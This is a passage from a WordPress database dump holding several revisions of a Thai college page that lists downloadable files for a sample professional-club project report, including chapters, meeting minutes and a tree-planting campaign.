ประกาศองค์การ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/8-ขอเชิญประชุมคณะกรรมการดำเนินงาน.docx\">8 ขอเชิญประชุมคณะกรรมการดำเนินงาน</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/8.1-ขออนุญาตจัดประชุม.docx\">8.1 ขออนุญาตจัดประชุม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/9-บันทึกการประชุม.docx\">9 บันทึกการประชุม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/10-รายงานการประชุม.docx\">10 รายงานการประชุม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/11-ลงลายมือชื่อการประชุม.docx\">11 ลงลายมือชื่อการประชุม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/12-รายงานการประชุมเขียนแล้ว.docx\">12 รายงานการประชุมเขียนแล้ว</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/13-ขอความอนุเคราะห์ประชาสัมพันธ์-R-1.docx\">13 ขอความอนุเคราะห์ประชาสัมพันธ์ R 1</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14-ขออนุญาตประชาสัมพันธ์.docx\">14 ขออนุญาตประชาสัมพันธ์</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14.1-สถานีวิทยุ-R-radio-101.00-MHz-R-2.docx\">14.1 สถานีวิทยุ R-radio 101.00 MHz R 2</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14.2-การเชิญเข้าร่วมโครงการรณรงค์ปลูกป่า.docx\">14.2 การเชิญเข้าร่วมโครงการรณรงค์ปลูกป่า</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14.3-การเชิญเข้าร่วมโครงการ.docx\">14.3 การเชิญเข้าร่วมโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14.4-แจ้งข่าวสารผ่านสื่อออนไลน.docx\">14.4 แจ้งข่าวสารผ่านสื่อออนไลน</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/15.กำหนดการโครงการ.doc\">15 กำหนดการโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/16-แบบลงทะเบียนเข้าร่วมโครงการ.xlsx\">16 แบบลงทะเบียนเข้าร่วมโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/16.1-สรุปสมาชิกทั้งหมด.docx\">16.1 สรุปสมาชิกทั้งหมด</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/16.2-ลงลายมือชื่ออาจารย์ที่เข้าร่วมโครงการ.doc\">16.2 ลงลายมือชื่ออาจารย์ที่เข้าร่วมโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/17-คำกล่าวของพิธีกร.doc\">17 คำกล่าวของพิธีกร</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/18-สรุปและรายงานผลการปฏิบัติงาน.docx\">18 สรุปและรายงานผลการปฏิบัติงาน</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19-ภาพที่-๑-แสดงภาพบรรยากาศของโครงการ.docx\">19 ภาพที่ ๑ แสดงภาพบรรยากาศของโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.1-ป้ายบนแผนกโครงการรณรงค์ปลูกป่า.docx\">19.1 ป้ายบนแผนกโครงการรณรงค์ปลูกป่า</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.2-แบบสอบถามโครงการ.docx\">19.2 แบบสอบถามโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.3-รูปโครงการ.doc\">19.3 รูปโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.4-บรรณานุกรม.docx\">19.4 บรรณานุกรม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.5-บรรณานุกรม-1.docx\">19.5 บรรณานุกรม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/20-คั่นหน้า.docx\">20 คั่นหน้า</a></span></h3>\r\n<h3></h3>\r\n ', 'ตัวอย่างรูปเล่มรายงานชมรมวิชาชีพ', '', 'inherit', 'closed', 'closed', '', '2558-revision-v1', '', '', '2018-05-21 16:39:11', '2018-05-21 09:39:11', '', 2558, 'http://www.technicrayong.ac.th/2558-revision-v1/', 0, 'revision', '', 0),
(2605, 3, '2018-05-21 16:39:51', '2018-05-21 09:39:51', '<img class=\"aligncenter wp-image-2559 size-large\" src=\"/wp-content/uploads/2018/05/1-ปกโครงการ-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" />\r\n<h3><span style=\"color: #0000ff;\">1 ปกโครงการ</span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/2-บทคัดย่อ.docx\">2 บทคัดย่อ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/2.1กิตติกรรมประกาศ.docx\">2.1 กิตติกรรมประกาศ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/3-คำนำ.docx\">3 คำนำ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/4.1-สารบัญ.docx\">4.1 สารบัญ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/4.2-สารบัญตาราง.docx\">4.2 สารบัญตาราง</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/4.3-สารบัญภาพ.docx\">4.3 สารบัญภาพ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.1-บทที่-1-โครงการ.doc\">5.1 บทที่ 1 โครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.2-บทที่2โครงการ.doc\">5.2 บทที่ 2 โครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.3-บทที่-3-โครงการ.doc\">5.3 บทที่ 3 โครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.4-บทที่-4-โครงการ.docx\">5.4 บทที่ 4 โครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.5-บทที่-5-โครงการ.docx\">5.5 บทที่ 5 โครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/6-รายงานผลโครงการ.docx\">6 รายงานผลโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/7-คำสั่งองค์การ.docx\">7 คำสั่งองค์การ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/7.1-ประกาศองค์การ-แก้ไข.docx\">7.1 ประกาศองค์การ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/8-ขอเชิญประชุมคณะกรรมการดำเนินงาน.docx\">8 ขอเชิญประชุมคณะกรรมการดำเนินงาน</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/8.1-ขออนุญาตจัดประชุม.docx\">8.1 ขออนุญาตจัดประชุม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/9-บันทึกการประชุม.docx\">9 บันทึกการประชุม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/10-รายงานการประชุม.docx\">10 รายงานการประชุม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/11-ลงลายมือชื่อการประชุม.docx\">11 ลงลายมือชื่อการประชุม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/12-รายงานการประชุมเขียนแล้ว.docx\">12 รายงานการประชุมเขียนแล้ว</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/13-ขอความอนุเคราะห์ประชาสัมพันธ์-R-1.docx\">13 ขอความอนุเคราะห์ประชาสัมพันธ์ R 1</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14-ขออนุญาตประชาสัมพันธ์.docx\">14 ขออนุญาตประชาสัมพันธ์</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14.1-สถานีวิทยุ-R-radio-101.00-MHz-R-2.docx\">14.1 สถานีวิทยุ R-radio 101.00 MHz R 2</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14.2-การเชิญเข้าร่วมโครงการรณรงค์ปลูกป่า.docx\">14.2 การเชิญเข้าร่วมโครงการรณรงค์ปลูกป่า</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14.3-การเชิญเข้าร่วมโครงการ.docx\">14.3 การเชิญเข้าร่วมโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14.4-แจ้งข่าวสารผ่านสื่อออนไลน.docx\">14.4 แจ้งข่าวสารผ่านสื่อออนไลน</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/15.กำหนดการโครงการ.doc\">15 กำหนดการโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/16-แบบลงทะเบียนเข้าร่วมโครงการ.xlsx\">16 แบบลงทะเบียนเข้าร่วมโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/16.1-สรุปสมาชิกทั้งหมด.docx\">16.1 สรุปสมาชิกทั้งหมด</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/16.2-ลงลายมือชื่ออาจารย์ที่เข้าร่วมโครงการ.doc\">16.2 ลงลายมือชื่ออาจารย์ที่เข้าร่วมโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/17-คำกล่าวของพิธีกร.doc\">17 คำกล่าวของพิธีกร</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/18-สรุปและรายงานผลการปฏิบัติงาน.docx\">18 สรุปและรายงานผลการปฏิบัติงาน</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19-ภาพที่-๑-แสดงภาพบรรยากาศของโครงการ.docx\">19 ภาพที่ ๑ แสดงภาพบรรยากาศของโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.1-ป้ายบนแผนกโครงการรณรงค์ปลูกป่า.docx\">19.1 ป้ายบนแผนกโครงการรณรงค์ปลูกป่า</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.2-แบบสอบถามโครงการ.docx\">19.2 แบบสอบถามโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.3-รูปโครงการ.doc\">19.3 รูปโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.4-บรรณานุกรม.docx\">19.4 บรรณานุกรม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.5-บรรณานุกรม-1.docx\">19.5 บรรณานุกรม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/20-คั่นหน้า.docx\">20 คั่นหน้า</a></span></h3>\r\n<h3></h3>\r\n ', 'ตัวอย่างรูปเล่มรายงานชมรมวิชาชีพ', '', 'inherit', 'closed', 'closed', '', '2558-revision-v1', '', '', '2018-05-21 16:39:51', '2018-05-21 09:39:51', '', 2558, 'http://www.technicrayong.ac.th/2558-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2606, 3, '2018-05-21 16:42:08', '2018-05-21 09:42:08', '<img class=\"wp-image-2559 size-large aligncenter\" src=\"/wp-content/uploads/2018/05/1-ปกโครงการ-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" />\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3><span style=\"color: #0000ff;\">1 ปกโครงการ</span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/2-บทคัดย่อ.docx\">2 บทคัดย่อ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/2.1กิตติกรรมประกาศ.docx\">2.1 กิตติกรรมประกาศ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/3-คำนำ.docx\">3 คำนำ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/4.1-สารบัญ.docx\">4.1 สารบัญ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/4.2-สารบัญตาราง.docx\">4.2 สารบัญตาราง</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/4.3-สารบัญภาพ.docx\">4.3 สารบัญภาพ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.1-บทที่-1-โครงการ.doc\">5.1 บทที่ 1 โครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.2-บทที่2โครงการ.doc\">5.2 บทที่ 2 โครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.3-บทที่-3-โครงการ.doc\">5.3 บทที่ 3 โครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.4-บทที่-4-โครงการ.docx\">5.4 บทที่ 4 โครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.5-บทที่-5-โครงการ.docx\">5.5 บทที่ 5 โครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/6-รายงานผลโครงการ.docx\">6 รายงานผลโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/7-คำสั่งองค์การ.docx\">7 คำสั่งองค์การ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/7.1-ประกาศองค์การ-แก้ไข.docx\">7.1 ประกาศองค์การ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/8-ขอเชิญประชุมคณะกรรมการดำเนินงาน.docx\">8 ขอเชิญประชุมคณะกรรมการดำเนินงาน</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/8.1-ขออนุญาตจัดประชุม.docx\">8.1 ขออนุญาตจัดประชุม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/9-บันทึกการประชุม.docx\">9 บันทึกการประชุม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/10-รายงานการประชุม.docx\">10 รายงานการประชุม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/11-ลงลายมือชื่อการประชุม.docx\">11 ลงลายมือชื่อการประชุม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/12-รายงานการประชุมเขียนแล้ว.docx\">12 รายงานการประชุมเขียนแล้ว</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/13-ขอความอนุเคราะห์ประชาสัมพันธ์-R-1.docx\">13 ขอความอนุเคราะห์ประชาสัมพันธ์ R 1</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14-ขออนุญาตประชาสัมพันธ์.docx\">14 ขออนุญาตประชาสัมพันธ์</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14.1-สถานีวิทยุ-R-radio-101.00-MHz-R-2.docx\">14.1 สถานีวิทยุ R-radio 101.00 MHz R 2</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14.2-การเชิญเข้าร่วมโครงการรณรงค์ปลูกป่า.docx\">14.2 การเชิญเข้าร่วมโครงการรณรงค์ปลูกป่า</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14.3-การเชิญเข้าร่วมโครงการ.docx\">14.3 การเชิญเข้าร่วมโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/14.4-แจ้งข่าวสารผ่านสื่อออนไลน.docx\">14.4 แจ้งข่าวสารผ่านสื่อออนไลน</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/15.กำหนดการโครงการ.doc\">15 กำหนดการโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/16-แบบลงทะเบียนเข้าร่วมโครงการ.xlsx\">16 แบบลงทะเบียนเข้าร่วมโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/16.1-สรุปสมาชิกทั้งหมด.docx\">16.1 สรุปสมาชิกทั้งหมด</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/16.2-ลงลายมือชื่ออาจารย์ที่เข้าร่วมโครงการ.doc\">16.2 ลงลายมือชื่ออาจารย์ที่เข้าร่วมโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/17-คำกล่าวของพิธีกร.doc\">17 คำกล่าวของพิธีกร</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/18-สรุปและรายงานผลการปฏิบัติงาน.docx\">18 สรุปและรายงานผลการปฏิบัติงาน</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19-ภาพที่-๑-แสดงภาพบรรยากาศของโครงการ.docx\">19 ภาพที่ ๑ แสดงภาพบรรยากาศของโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.1-ป้ายบนแผนกโครงการรณรงค์ปลูกป่า.docx\">19.1 ป้ายบนแผนกโครงการรณรงค์ปลูกป่า</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.2-แบบสอบถามโครงการ.docx\">19.2 แบบสอบถามโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.3-รูปโครงการ.doc\">19.3 รูปโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.4-บรรณานุกรม.docx\">19.4 บรรณานุกรม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/19.5-บรรณานุกรม-1.docx\">19.5 บรรณานุกรม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/20-คั่นหน้า.docx\">20 คั่นหน้า</a></span></h3>\r\n<h3></h3>\r\n ', 'ตัวอย่างรูปเล่มรายงานชมรมวิชาชีพ', '', 'inherit', 'closed', 'closed', '', '2558-revision-v1', '', '', '2018-05-21 16:42:08', '2018-05-21 09:42:08', '', 2558, 'http://www.technicrayong.ac.th/2558-revision-v1/', 0, 'revision', '', 0),
(2608, 3, '2018-05-21 16:45:50', '2018-05-21 09:45:50', '', 'ปกโครงการ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%81%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-05-21 16:45:50', '2018-05-21 09:45:50', '', 2558, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/ปกโครงการ.pdf', 0, 'attachment', 'application/pdf', 0),
(2609, 3, '2018-05-21 16:46:20', '2018-05-21 09:46:20', '<h3><a href=\"/wp-content/uploads/2018/05/ปกโครงการ.pdf\">1 ปกโครงการ</a></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/2-บทคัดย่อ.docx\">2 บทคัดย่อ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/2.1กิตติกรรมประกาศ.docx\">2.1 กิตติกรรมประกาศ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/3-คำนำ.docx\">3 คำนำ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/4.1-สารบัญ.docx\">4.1 สารบัญ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/4.2-สารบัญตาราง.docx\">4.2 สารบัญตาราง</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/4.3-สารบัญภาพ.docx\">4.3 สารบัญภาพ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.1-บทที่-1-โครงการ.doc\">5.1 บทที่ 1 โครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.2-บทที่2โครงการ.doc\">5.2 บทที่ 2 โครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.3-บทที่-3-โครงการ.doc\">5.3 บทที่ 3 โครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.4-บทที่-4-โครงการ.docx\">5.4 บทที่ 4 โครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/5.5-บทที่-5-โครงการ.docx\">5.5 บทที่ 5 โครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/6-รายงานผลโครงการ.docx\">6 รายงานผลโครงการ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/7-คำสั่งองค์การ.docx\">7 คำสั่งองค์การ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/7.1-ประกาศองค์การ-แก้ไข.docx\">7.1 ประกาศองค์การ</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/8-ขอเชิญประชุมคณะกรรมการดำเนินงาน.docx\">8 ขอเชิญประชุมคณะกรรมการดำเนินงาน</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/8.1-ขออนุญาตจัดประชุม.docx\">8.1 ขออนุญาตจัดประชุม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/9-บันทึกการประชุม.docx\">9 บันทึกการประชุม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/10-รายงานการประชุม.docx\">10 รายงานการประชุม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/11-ลงลายมือชื่อการประชุม.docx\">11 ลงลายมือชื่อการประชุม</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/12-รายงานการประชุมเขียนแล้ว.docx\">12 รายงานการประชุมเขียนแล้ว</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/13-ขอความอนุเคราะห์ประชาสัมพันธ์-R-1.docx\">13 ขอความอนุเคราะห์ประชาสัมพันธ์ R 1</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" 